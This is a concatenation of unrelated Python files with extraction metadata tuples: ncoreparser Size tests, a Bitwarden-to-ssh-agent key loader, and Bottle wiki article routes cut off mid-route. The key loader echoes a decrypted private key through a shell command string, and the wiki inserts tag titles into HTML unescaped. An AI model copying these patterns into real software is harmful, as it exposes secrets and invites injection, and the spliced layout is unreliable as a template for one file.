'import easygui\n'), ((3831, 3908), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Any Other Remarks"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Any Other Remarks', title='Service Visit Inputs')\n", (3847, 3908), False, 'import easygui\n')] |
import pytest
from ncoreparser.util import Size
class TestSize:
@pytest.mark.parametrize("size1, size2", [("1024 MiB", "1 GiB"),
("10 MiB", "10 MiB"),
("2048 KiB", "2 MiB")])
def test_equal(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 == s2
@pytest.mark.parametrize("size1, size2", [("1023 MiB", "1 GiB"),
("10 MiB", "11 MiB"),
("2049 KiB", "2 MiB")])
def test_not_equal(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 != s2
@pytest.mark.parametrize("size1, size2", [("1025 MiB", "1 GiB"),
("11 MiB", "10 MiB"),
("2049 KiB", "2 MiB")])
def test_greater_than(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 > s2
@pytest.mark.parametrize("size1, size2", [("1025 MiB", "1 GiB"),
("10 MiB", "10 MiB"),
("2049 KiB", "2 MiB"),
("2048 KiB", "2 MiB")])
def test_greater_equal(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 >= s2
@pytest.mark.parametrize("size1, size2, expected", [("1024 MiB", "1 GiB", "2.00 GiB"),
("10 MiB", "11 MiB", "21.00 MiB"),
("2048 KiB", "2 MiB", "4.00 MiB")])
def test_add(self, size1, size2, expected):
s = Size(size1) + Size(size2)
assert str(s) == expected
s = Size(size1)
s += Size(size2)
assert str(s) == expected
| [
"ncoreparser.util.Size",
"pytest.mark.parametrize"
] | [((71, 184), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1024 MiB', '1 GiB'), ('10 MiB', '10 MiB'), ('2048 KiB', '2 MiB')]"], {}), "('size1, size2', [('1024 MiB', '1 GiB'), ('10 MiB',\n '10 MiB'), ('2048 KiB', '2 MiB')])\n", (94, 184), False, 'import pytest\n'), ((393, 506), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1023 MiB', '1 GiB'), ('10 MiB', '11 MiB'), ('2049 KiB', '2 MiB')]"], {}), "('size1, size2', [('1023 MiB', '1 GiB'), ('10 MiB',\n '11 MiB'), ('2049 KiB', '2 MiB')])\n", (416, 506), False, 'import pytest\n'), ((719, 832), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1025 MiB', '1 GiB'), ('11 MiB', '10 MiB'), ('2049 KiB', '2 MiB')]"], {}), "('size1, size2', [('1025 MiB', '1 GiB'), ('11 MiB',\n '10 MiB'), ('2049 KiB', '2 MiB')])\n", (742, 832), False, 'import pytest\n'), ((1047, 1183), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1025 MiB', '1 GiB'), ('10 MiB', '10 MiB'), ('2049 KiB', '2 MiB'), (\n '2048 KiB', '2 MiB')]"], {}), "('size1, size2', [('1025 MiB', '1 GiB'), ('10 MiB',\n '10 MiB'), ('2049 KiB', '2 MiB'), ('2048 KiB', '2 MiB')])\n", (1070, 1183), False, 'import pytest\n'), ((1446, 1610), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2, expected"""', "[('1024 MiB', '1 GiB', '2.00 GiB'), ('10 MiB', '11 MiB', '21.00 MiB'), (\n '2048 KiB', '2 MiB', '4.00 MiB')]"], {}), "('size1, size2, expected', [('1024 MiB', '1 GiB',\n '2.00 GiB'), ('10 MiB', '11 MiB', '21.00 MiB'), ('2048 KiB', '2 MiB',\n '4.00 MiB')])\n", (1469, 1610), False, 'import pytest\n'), ((326, 337), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (330, 337), False, 'from ncoreparser.util import Size\n'), ((351, 362), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (355, 362), False, 'from ncoreparser.util import Size\n'), ((652, 663), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (656, 663), False, 'from ncoreparser.util import Size\n'), ((677, 688), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (681, 688), False, 'from ncoreparser.util import Size\n'), ((981, 992), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (985, 992), False, 'from ncoreparser.util import Size\n'), ((1006, 1017), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1010, 1017), False, 'from ncoreparser.util import Size\n'), ((1379, 1390), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (1383, 1390), False, 'from ncoreparser.util import Size\n'), ((1404, 1415), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1408, 1415), False, 'from ncoreparser.util import Size\n'), ((1847, 1858), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (1851, 1858), False, 'from ncoreparser.util import Size\n'), ((1872, 1883), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1876, 1883), False, 'from ncoreparser.util import Size\n'), ((1775, 1786), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (1779, 1786), False, 'from ncoreparser.util import Size\n'), ((1789, 1800), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1793, 1800), False, 'from ncoreparser.util import Size\n')] |
#!/usr/bin/env python3
"""
Extracts SSH keys from Bitwarden vault
"""
import argparse
import json
import logging
import os
import subprocess
import pexpect
import time
from pkg_resources import parse_version
def memoize(func):
"""
Decorator function to cache the results of another function call
"""
cache = dict()
def memoized_func(*args):
if args in cache:
return cache[args]
result = func(*args)
cache[args] = result
return result
return memoized_func
@memoize
def bwcli_version():
"""
Function to return the version of the Bitwarden CLI
"""
proc_version = subprocess.run(
['bw', '--version'],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return proc_version.stdout
@memoize
def cli_supports(feature):
"""
Function to return whether the current Bitwarden CLI supports a particular
feature
"""
version = parse_version(bwcli_version())
if feature == 'nointeraction' and version >= parse_version('1.9.0'):
return True
return False
def get_session():
"""
Function to return a valid Bitwarden session
"""
# Check for an existing, user-supplied Bitwarden session
session = os.environ.get('BW_SESSION')
if session is not None:
logging.debug('Existing Bitwarden session found')
return session
# Check if we're already logged in
proc_logged = subprocess.run(['bw', 'login', '--check', '--quiet'])
if proc_logged.returncode:
logging.debug('Not logged into Bitwarden')
operation = 'login'
else:
logging.debug('Bitwarden vault is locked')
operation = 'unlock'
proc_session = subprocess.run(
['bw', '--raw', operation],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return proc_session.stdout
def get_folders(session, foldername):
"""
Function to return the ID of the folder that matches the provided name
"""
logging.debug('Folder name: %s', foldername)
proc_folders = subprocess.run(
['bw', 'list', 'folders', '--search', foldername, '--session', session],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
folders = json.loads(proc_folders.stdout)
if not folders:
logging.error('"%s" folder not found', foldername)
return None
# Do we have any folders
if len(folders) != 1:
logging.error('%d folders with the name "%s" found', len(folders), foldername)
return None
return folders[0]['id']
def folder_items(session, folder_id):
"""
Function to return items from a folder
"""
logging.debug('Folder ID: %s', folder_id)
proc_items = subprocess.run(
[ 'bw', 'list', 'items', '--folderid', folder_id, '--session', session],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return json.loads(proc_items.stdout)
def add_ssh_keys(session, items, keyname):
"""
Function to attempt to get keys from a vault item
"""
for item in items:
try:
private_key_file = [k['value'] for k in item['fields']
if k['name'] == keyname and k['type'] == 0][0]
except IndexError:
logging.warning('No "%s" field found for item %s', keyname, item['name'])
continue
except KeyError as e:
logging.debug('No key "%s" found in item %s - skipping', e.args[0], item['name'])
continue
logging.debug('Private key file declared')
try:
private_key_id = [k['id'] for k in item['attachments']
if k['fileName'] == private_key_file][0]
except IndexError:
logging.warning(
'No attachment called "%s" found for item %s',
private_key_file,
item['name']
)
continue
logging.debug('Private key ID found')
try:
logging.debug('trying to add key ' + item['name'])
ssh_add(session, item['id'], private_key_id, item['name'])
except subprocess.SubprocessError:
logging.warning('Could not add key to the SSH agent')
def ssh_add(session, item_id, key_id, key_name):
"""
Function to get the key contents from the Bitwarden vault
"""
logging.debug('Item ID: %s', item_id)
logging.debug('Key ID: %s', key_id)
proc_passphrase = subprocess.run([
'bw',
'get',
'item', item_id,
'--session', session
],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
temp_passphrase = json.loads(proc_passphrase.stdout)
for field in temp_passphrase['fields']:
if field['name'] == 'passphrase':
passphrase = field['value']
proc_attachment = subprocess.run([
'bw',
'get',
'attachment', key_id,
'--itemid', item_id,
'--raw',
'--session', session
],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
ssh_key = proc_attachment.stdout
logging.debug("Running ssh-add")
cmd = ' echo "' + ssh_key + ' " | ssh-add -'
child = pexpect.spawn('sh', env=dict(os.environ, SSH_ASKPASS_REQUIRE="never"), echo=False)
child.sendline('stty -icanon')
# https://unix.stackexchange.com/questions/611355/does-zsh-use-canonical-mode-for-the-terminal
# https://github.com/pexpect/pexpect/issues/55
# https://pexpect.readthedocs.io/en/stable/api/pexpect.html (send, PC_MAX_CANON)
# i'm using macOS with zsh as my loginshell, just works
time.sleep(0.2)
cmdlines = cmd.splitlines()
for item in cmdlines:
child.sendline(item)
time.sleep(0.2)
index = child.expect(['Enter passphrase for.*', '.*dentity added:.*', pexpect.TIMEOUT, pexpect.EOF], timeout=2)
if index == 0:
logging.debug('Entering passphrase...')
child.waitnoecho()
child.sendline(passphrase)
child.waitnoecho()
passphraseindex = child.expect([pexpect.TIMEOUT, pexpect.EOF, '.*dentity added:.*', '.*ad passphrase, try again for.*'], timeout=2)
if passphraseindex == 0:
logging.debug('Passphrase timeout')
if passphraseindex == 1:
logging.debug('EOF?')
if passphraseindex == 2:
logging.info('Identity ' + key_name + ' added')
if passphraseindex == 3:
logging.error('Wrong passphrase, skipping...')
if index == 1:
logging.info('Identity ' + key_name + ' added, no passphrase needed')
if index == 2:
logging.error('Timeout')
if index == 3:
logging.debug('EOF?')
child.close()
cmd = None
passphrase = None
if __name__ == '__main__':
def parse_args():
"""
Function to parse command line arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'-d', '--debug',
action='store_true',
help='show debug output',
)
parser.add_argument(
'-f', '--foldername',
default='ssh-agent',
help='folder name to use to search for SSH keys',
)
parser.add_argument(
'-c', '--customfield',
default='private',
help='custom field name where private key filename is stored',
)
return parser.parse_args()
def main():
"""
Main program logic
"""
args = parse_args()
if args.debug:
loglevel = logging.DEBUG
else:
loglevel = logging.INFO
logging.basicConfig(level=loglevel)
try:
logging.info('Getting Bitwarden session')
session = get_session()
logging.debug('Session = %s', session)
logging.info('Getting folder list')
folder_id = get_folders(session, args.foldername)
logging.info('Getting folder items')
items = folder_items(session, folder_id)
logging.info('Attempting to add keys to ssh-agent')
add_ssh_keys(session, items, args.customfield)
except subprocess.CalledProcessError as e:
if e.stderr:
logging.error('`%s` error: %s', e.cmd[0], e.stderr)
logging.debug('Error running %s', e.cmd)
main()
| [
"logging.basicConfig",
"json.loads",
"logging.debug",
"argparse.ArgumentParser",
"subprocess.run",
"os.environ.get",
"logging.info",
"time.sleep",
"logging.warning",
"pkg_resources.parse_version",
"logging.error"
] | [((652, 752), 'subprocess.run', 'subprocess.run', (["['bw', '--version']"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', '--version'], stdout=subprocess.PIPE,\n universal_newlines=True, check=True)\n", (666, 752), False, 'import subprocess\n'), ((1281, 1309), 'os.environ.get', 'os.environ.get', (['"""BW_SESSION"""'], {}), "('BW_SESSION')\n", (1295, 1309), False, 'import os\n'), ((1477, 1530), 'subprocess.run', 'subprocess.run', (["['bw', 'login', '--check', '--quiet']"], {}), "(['bw', 'login', '--check', '--quiet'])\n", (1491, 1530), False, 'import subprocess\n'), ((1752, 1859), 'subprocess.run', 'subprocess.run', (["['bw', '--raw', operation]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', '--raw', operation], stdout=subprocess.PIPE,\n universal_newlines=True, check=True)\n", (1766, 1859), False, 'import subprocess\n'), ((2062, 2106), 'logging.debug', 'logging.debug', (['"""Folder name: %s"""', 'foldername'], {}), "('Folder name: %s', foldername)\n", (2075, 2106), False, 'import logging\n'), ((2127, 2283), 'subprocess.run', 'subprocess.run', (["['bw', 'list', 'folders', '--search', foldername, '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'list', 'folders', '--search', foldername,\n '--session', session], stdout=subprocess.PIPE, universal_newlines=True,\n check=True)\n", (2141, 2283), False, 'import subprocess\n'), ((2330, 2361), 'json.loads', 'json.loads', (['proc_folders.stdout'], {}), '(proc_folders.stdout)\n', (2340, 2361), False, 'import json\n'), ((2757, 2798), 'logging.debug', 'logging.debug', (['"""Folder ID: %s"""', 'folder_id'], {}), "('Folder ID: %s', folder_id)\n", (2770, 2798), False, 'import logging\n'), ((2817, 2968), 'subprocess.run', 'subprocess.run', (["['bw', 'list', 'items', '--folderid', folder_id, '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'list', 'items', '--folderid', folder_id, '--session',\n session], stdout=subprocess.PIPE, universal_newlines=True, check=True)\n", (2831, 2968), False, 'import subprocess\n'), ((3016, 3045), 'json.loads', 'json.loads', (['proc_items.stdout'], {}), '(proc_items.stdout)\n', (3026, 3045), False, 'import json\n'), ((4478, 4515), 'logging.debug', 'logging.debug', (['"""Item ID: %s"""', 'item_id'], {}), "('Item ID: %s', item_id)\n", (4491, 4515), False, 'import logging\n'), ((4520, 4555), 'logging.debug', 'logging.debug', (['"""Key ID: %s"""', 'key_id'], {}), "('Key ID: %s', key_id)\n", (4533, 4555), False, 'import logging\n'), ((4579, 4713), 'subprocess.run', 'subprocess.run', (["['bw', 'get', 'item', item_id, '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'get', 'item', item_id, '--session', session], stdout\n =subprocess.PIPE, universal_newlines=True, check=True)\n", (4593, 4713), False, 'import subprocess\n'), ((4804, 4838), 'json.loads', 'json.loads', (['proc_passphrase.stdout'], {}), '(proc_passphrase.stdout)\n', (4814, 4838), False, 'import json\n'), ((4993, 5165), 'subprocess.run', 'subprocess.run', (["['bw', 'get', 'attachment', key_id, '--itemid', item_id, '--raw',\n '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'get', 'attachment', key_id, '--itemid', item_id,\n '--raw', '--session', session], stdout=subprocess.PIPE,\n universal_newlines=True, check=True)\n", (5007, 5165), False, 'import subprocess\n'), ((5312, 5344), 'logging.debug', 'logging.debug', (['"""Running ssh-add"""'], {}), "('Running ssh-add')\n", (5325, 5344), False, 'import logging\n'), ((5828, 5843), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (5838, 5843), False, 'import time\n'), ((5945, 5960), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (5955, 5960), False, 'import time\n'), ((1346, 1395), 'logging.debug', 'logging.debug', (['"""Existing Bitwarden session found"""'], {}), "('Existing Bitwarden session found')\n", (1359, 1395), False, 'import logging\n'), ((1571, 1613), 'logging.debug', 'logging.debug', (['"""Not logged into Bitwarden"""'], {}), "('Not logged into Bitwarden')\n", (1584, 1613), False, 'import logging\n'), ((1660, 1702), 'logging.debug', 'logging.debug', (['"""Bitwarden vault is locked"""'], {}), "('Bitwarden vault is locked')\n", (1673, 1702), False, 'import logging\n'), ((2391, 2441), 'logging.error', 'logging.error', (['""""%s" folder not found"""', 'foldername'], {}), '(\'"%s" folder not found\', foldername)\n', (2404, 2441), False, 'import logging\n'), ((3630, 3672), 'logging.debug', 'logging.debug', (['"""Private key file declared"""'], {}), "('Private key file declared')\n", (3643, 3672), False, 'import logging\n'), ((4050, 4087), 'logging.debug', 'logging.debug', (['"""Private key ID found"""'], {}), "('Private key ID found')\n", (4063, 4087), False, 'import logging\n'), ((6105, 6144), 'logging.debug', 'logging.debug', (['"""Entering passphrase..."""'], {}), "('Entering passphrase...')\n", (6118, 6144), False, 'import logging\n'), ((6739, 6808), 'logging.info', 'logging.info', (["('Identity ' + key_name + ' added, no passphrase needed')"], {}), "('Identity ' + key_name + ' added, no passphrase needed')\n", (6751, 6808), False, 'import logging\n'), ((6836, 6860), 'logging.error', 'logging.error', (['"""Timeout"""'], {}), "('Timeout')\n", (6849, 6860), False, 'import logging\n'), ((6888, 6909), 'logging.debug', 'logging.debug', (['"""EOF?"""'], {}), "('EOF?')\n", (6901, 6909), False, 'import logging\n'), ((7109, 7134), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (7132, 7134), False, 'import argparse\n'), ((7876, 7911), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'loglevel'}), '(level=loglevel)\n', (7895, 7911), False, 'import logging\n'), ((1059, 1081), 'pkg_resources.parse_version', 'parse_version', (['"""1.9.0"""'], {}), "('1.9.0')\n", (1072, 1081), False, 'from pkg_resources import parse_version\n'), ((4114, 4164), 'logging.debug', 'logging.debug', (["('trying to add key ' + item['name'])"], {}), "('trying to add key ' + item['name'])\n", (4127, 4164), False, 'import logging\n'), ((6420, 6455), 'logging.debug', 'logging.debug', (['"""Passphrase timeout"""'], {}), "('Passphrase timeout')\n", (6433, 6455), False, 'import logging\n'), ((6501, 6522), 'logging.debug', 'logging.debug', (['"""EOF?"""'], {}), "('EOF?')\n", (6514, 6522), False, 'import logging\n'), ((6568, 6615), 'logging.info', 'logging.info', (["('Identity ' + key_name + ' added')"], {}), "('Identity ' + key_name + ' added')\n", (6580, 6615), False, 'import logging\n'), ((6661, 6707), 'logging.error', 'logging.error', (['"""Wrong passphrase, skipping..."""'], {}), "('Wrong passphrase, skipping...')\n", (6674, 6707), False, 'import logging\n'), ((7938, 7979), 'logging.info', 'logging.info', (['"""Getting Bitwarden session"""'], {}), "('Getting Bitwarden session')\n", (7950, 7979), False, 'import logging\n'), ((8028, 8066), 'logging.debug', 'logging.debug', (['"""Session = %s"""', 'session'], {}), "('Session = %s', session)\n", (8041, 8066), False, 'import logging\n'), ((8080, 8115), 'logging.info', 'logging.info', (['"""Getting folder list"""'], {}), "('Getting folder list')\n", (8092, 8115), False, 'import logging\n'), ((8191, 8227), 'logging.info', 'logging.info', (['"""Getting folder items"""'], {}), "('Getting folder items')\n", (8203, 8227), False, 'import logging\n'), ((8294, 8345), 'logging.info', 'logging.info', (['"""Attempting to add keys to ssh-agent"""'], {}), "('Attempting to add keys to ssh-agent')\n", (8306, 8345), False, 'import logging\n'), ((3382, 3455), 'logging.warning', 'logging.warning', (['"""No "%s" field found for item %s"""', 'keyname', "item['name']"], {}), '(\'No "%s" field found for item %s\', keyname, item[\'name\'])\n', (3397, 3455), False, 'import logging\n'), ((3519, 3605), 'logging.debug', 'logging.debug', (['"""No key "%s" found in item %s - skipping"""', 'e.args[0]', "item['name']"], {}), '(\'No key "%s" found in item %s - skipping\', e.args[0], item[\n \'name\'])\n', (3532, 3605), False, 'import logging\n'), ((3864, 3962), 'logging.warning', 'logging.warning', (['"""No attachment called "%s" found for item %s"""', 'private_key_file', "item['name']"], {}), '(\'No attachment called "%s" found for item %s\',\n private_key_file, item[\'name\'])\n', (3879, 3962), False, 'import logging\n'), ((4291, 4344), 'logging.warning', 'logging.warning', (['"""Could not add key to the SSH agent"""'], {}), "('Could not add key to the SSH agent')\n", (4306, 4344), False, 'import logging\n'), ((8561, 8601), 'logging.debug', 'logging.debug', (['"""Error running %s"""', 'e.cmd'], {}), "('Error running %s', e.cmd)\n", (8574, 8601), False, 'import logging\n'), ((8497, 8548), 'logging.error', 'logging.error', (['"""`%s` error: %s"""', 'e.cmd[0]', 'e.stderr'], {}), "('`%s` error: %s', e.cmd[0], e.stderr)\n", (8510, 8548), False, 'import logging\n')] |
from bottle import (
template,
route,
redirect,
request,
)
from models import (
Article,
ArticleLinks,
Wiki,
Author,
Tag,
Metadata,
)
from peewee import SQL
from .decorators import *
from .wiki import wiki_home
from .media import image_search
from utils import Message, Error, Unsafe
import datetime
@route(f"{Wiki.PATH}/article")
@wiki_env
def articles(wiki: Wiki, user: Author):
return wiki_home(wiki, user)
@route(f"{Wiki.PATH}{Article.PATH}")
@article_env
def article_display_(wiki: Wiki, user: Author, article: Article):
return article_display(wiki, user, article)
def new_article_from_form_core(wiki: Wiki, user: Author, form: str, title: str):
form_article = wiki.articles.where(Article.title == wiki.url_to_title(form)).get()
new_article = form_article.make_from_form(wiki.url_to_title(title))
return redirect(new_article.edit_link)
@route(f"{Wiki.PATH}/new_from_form/<form>")
@wiki_env
def article_new_from_form(wiki: Wiki, user: Author, form: str):
return new_article_from_form_core(wiki, user, form, "Untitled")
@route(f"{Wiki.PATH}/new_from_form/<form>/<title>")
@wiki_env
def article_new_from_form_with_title(wiki: Wiki, user: Author, form: str, title: str):
return new_article_from_form_core(wiki, user, form, title)
@route(f"{Wiki.PATH}{Article.PATH}/revision/<revision_id>")
@article_env
def article_revision(wiki: Wiki, user: Author, article: Article, revision_id: str):
try:
revision = article.revisions.where(Article.id == int(revision_id)).get()
except Exception:
return wiki_home(wiki, user)
return template(
"article.tpl",
articles=[revision],
page_title=f"{revision.title} ({wiki.title})",
wiki=wiki,
)
@route(f"{Wiki.PATH}{Article.PATH}/history")
@article_env
def article_history(wiki: Wiki, user: Author, article: Article):
return template(
"article_history.tpl",
article=article,
page_title=f"History: {article.title} ({wiki.title})",
wiki=wiki,
)
@route(f"{Wiki.PATH}{Article.PATH}/preview", method=("GET", "POST"))
@article_env
def article_preview(wiki: Wiki, user: Author, article: Article):
if request.method == "POST":
article = Article(
title=request.forms.article_title, content=request.forms.article_content,
)
if article.id is None:
article.content = f'This article does not exist. Click the <a class="autogenerate" href="{article.edit_link}">edit link</a> to create this article.'
return template(
"includes/article_core.tpl",
article=article,
page_title=article.title,
wiki=wiki,
style=wiki.stylesheet(),
)
@route(f"{Wiki.PATH}{Article.PATH}/save", method="POST")
def article_save_ajax(wiki_title: str, article_title: str):
return article_edit(wiki_title, article_title, ajax=True)
@route(f"{Wiki.PATH}{Article.PATH}/edit", method=("GET", "POST"))
@article_env
def article_edit(wiki: Wiki, user: Author, article: Article, ajax=False):
# Redirect to article creation if we try to edit a nonexistent article
if article.id is None:
return redirect(f"{wiki.link}/new?title={Wiki.title_to_url(article.title)}")
# Redirect to edit link if we visit the draft of the article
if request.method == "GET":
if article.draft_of:
return redirect(article.draft_of.edit_link)
error = None
warning = None
# Create draft if it doesn't exist
if article.id is not None and not article.draft_of:
if article.drafts.count():
article = article.drafts.get()
else:
# TODO: check for name collisions
draft = Article(
wiki=article.wiki,
title=f"Draft: {article.title}",
content=article.content,
author=article.author,
created=article.created,
draft_of=article,
)
draft.save()
draft.update_links()
draft.update_autogen_metadata()
draft.copy_tags_from(article)
draft.copy_metadata_from(article)
article = draft
wiki.invalidate_cache()
original_article = article
original_id = article.id
# Check if article opened in edit mode without being formally closed out
if request.method == "GET":
if article.opened_by is None:
article.opened_by = article.author
article.last_edited = datetime.datetime.now()
article.save()
else:
warning = Message(
"This article was previously opened for editing without being saved. It may contain unsaved changes elsewhere. Use 'Save and Exit' or 'Quit Editing' to remove this message."
)
if request.method == "POST" or ajax is True:
action = request.forms.save
if action == "quit":
article.opened_by = None
article.save()
article.update_index()
article.update_autogen_metadata()
article.update_links()
wiki.invalidate_cache()
return redirect(article.link)
elif action == "discard":
wiki.invalidate_cache()
return redirect(article.discard_draft_link)
article_content = request.forms.article_content
article_title = request.forms.article_title
if article_content != article.content:
article.content = article_content
article.last_edited = datetime.datetime.now()
renamed = False
if article.new_title is None:
if article_title != article.draft_of.title:
article.new_title = article_title
renamed = True
else:
if article_title != article.new_title:
article.new_title = article_title
renamed = True
if renamed:
if article.has_new_name_collision():
error = Error(
f'An article named "{Unsafe(article_title)}" already exists. Choose another name for this article.'
)
if error is None:
article.save()
article.update_index()
article.update_links()
article.update_autogen_metadata()
wiki.invalidate_cache()
if action == "exit":
article.opened_by = None
article.save()
return redirect(article.link)
elif action in {"publish", "revise"}:
new_article = article.draft_of
if action == "revise":
new_article.make_revision()
if article.new_title:
new_article.title = article.new_title
# Check for rename options here
new_article.content = article.content
new_article.last_edited = article.last_edited
new_article.save()
new_article.update_index()
new_article.update_links()
new_article.clear_metadata()
new_article.update_autogen_metadata()
new_article.copy_metadata_from(article)
new_article.clear_tags()
new_article.copy_tags_from(article)
article.delete_()
return redirect(new_article.link)
elif action == "save":
article.opened_by = None
article.save()
if article.draft_of:
return redirect(article.draft_of.edit_link)
return redirect(article.link)
else:
original_article = Article.get(Article.id == article.id)
if ajax:
if error:
return str(error)
return str(Message("Article successfully saved.", color="success"))
article.content = article.content.replace("&", "&")
return template(
"article_edit.tpl",
article=article,
page_title=f"Editing: {article.title} ({wiki.title})",
wiki=wiki,
original_article=original_article,
messages=[error, warning],
has_error="true" if error else "false",
style=wiki.stylesheet(),
)
@route(f"{Wiki.PATH}{Article.PATH}/delete")
@article_env
def article_delete(wiki: Wiki, user: Author, article: Article):
warning = f'Article "{Unsafe(article.title)}" is going to be deleted! Deleted articles are GONE FOREVER.'
if article.revision_of:
warning += "<hr/>This is an earlier revision of an existing article. Deleting this will remove it from that article's revision history. This is allowed, but NOT RECOMMENDED."
return template(
"article.tpl",
articles=[article],
page_title=f"Delete: {article.title} ({wiki.title})",
wiki=wiki,
messages=[Message(warning, yes=article.delete_confirm_link, no=article.link,)],
)
@route(f"{Wiki.PATH}{Article.PATH}/delete/<delete_key>")
@article_env
def article_delete_confirm(
wiki: Wiki, user: Author, article: Article, delete_key: str, redirect_to=None,
):
if article.id is None:
return redirect(wiki.link)
if article.delete_key != delete_key:
return redirect(article.link)
# TODO: this stuff should be in the delete_instance method
ArticleLinks.update(link=article.title, valid_link=None).where(
ArticleLinks.valid_link == article
).execute()
if article.drafts.count():
draft = article.drafts.get()
draft.delete_()
for revision in article.revisions.select():
revision.delete_()
article.delete_()
# TODO: Move tag-clearing / orphan-check operations to override of delete_instance for article?
wiki.invalidate_cache()
if redirect_to is None:
redirect_to = wiki.main_article
return template(
"article.tpl",
wiki=wiki,
articles=[redirect_to],
messages=[Error(f'Article "{Unsafe(article.title)}" has been deleted.')],
)
@route(f"{Wiki.PATH}{Article.PATH}/discard-draft")
@article_env
def draft_discard(wiki: Wiki, user: Author, article: Article):
if article.id is None:
return redirect(article.link)
if article.draft_of is None:
return redirect(article.link)
warning = f'"{Unsafe(article.title)}" is going to be discarded.'
if article.content != article.draft_of.content:
warning += (
"<br/>THIS DRAFT HAS MODIFICATIONS THAT WERE NOT SAVED TO THE ARTICLE."
)
return template(
"article.tpl",
articles=[article],
page_title=f"Discard draft: {article.title} ({wiki.title})",
wiki=wiki,
messages=[
Message(warning, yes=article.discard_draft_confirm_link, no=article.link,)
],
)
@route(f"{Wiki.PATH}{Article.PATH}/discard-draft/<delete_key>")
@article_env
def draft_discard_confirm(
wiki: Wiki, user: Author, article: Article, delete_key: str,
):
return article_delete_confirm.__wrapped__(
wiki, user, article, delete_key, redirect_to=article.draft_of
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-image")
@article_env
def modal_insert_image(wiki: Wiki, user: Author, article: Article):
return template(
"includes/modal.tpl",
title="Insert image into article",
body=template(
"includes/modal_search.tpl",
url=f"{article.link}/insert-image",
search_results=image_search(wiki, None),
),
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-image", method="POST")
@article_env
def modal_insert_image_search(wiki: Wiki, user: Author, article: Article):
search = request.forms.search_query
return image_search(wiki, search)
def existing_tags(article):
taglist = [""]
for tag in article.tags_alpha:
taglist.append(
f'<a href="#" onclick="removeTag(this)"; title="Click to remove this tag from this article" class="badge badge-primary">{tag.title}</a> '
)
tags = "".join(taglist)
return tags
def search_results(wiki, search):
if search is None or search == "":
search_results = (
wiki.tags.select().order_by(SQL("title COLLATE NOCASE")).limit(100)
)
else:
search_results = (
wiki.tags.select()
.where(Tag.title.contains(search))
.order_by(SQL("title COLLATE NOCASE"))
.limit(10)
)
results = ["<ul>"]
for result in search_results:
results.append(
f'<li><a href="#" onclick="insertTag(this);">{result.title}</li>'
)
results.append("</ul>")
return "".join(results)
@route(f"{Wiki.PATH}{Article.PATH}/insert-tag")
@article_env
def modal_tags(wiki: Wiki, user: Author, article: Article):
tags = existing_tags(article)
body = template(
"includes/modal_tag_search.tpl",
url=f"{article.link}/insert-tag",
search_results=search_results(wiki, None),
)
return template(
"includes/modal.tpl",
title="Edit article tags",
body=f'Existing tags (click to remove):<br/><div id="modal-tag-listing">{tags}</div><hr/>{body}',
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-tag", method="POST")
@article_env
def modal_tags_search(wiki: Wiki, user: Author, article: Article):
search = request.forms.search_query
return search_results(wiki, search)
@route(f"{Wiki.PATH}{Article.PATH}/add-tag", method="POST")
@article_env
def modal_add_tag(wiki: Wiki, user: Author, article: Article):
tag = request.forms.tag
article.add_tag(tag)
wiki.invalidate_cache()
return existing_tags(article)
@route(f"{Wiki.PATH}{Article.PATH}/remove-tag", method="POST")
@article_env
def modal_remove_tag(wiki: Wiki, user: Author, article: Article):
tag = request.forms.tag
article.remove_tag(tag)
wiki.invalidate_cache()
return existing_tags(article)
@route(f"{Wiki.PATH}{Article.PATH}/edit-metadata")
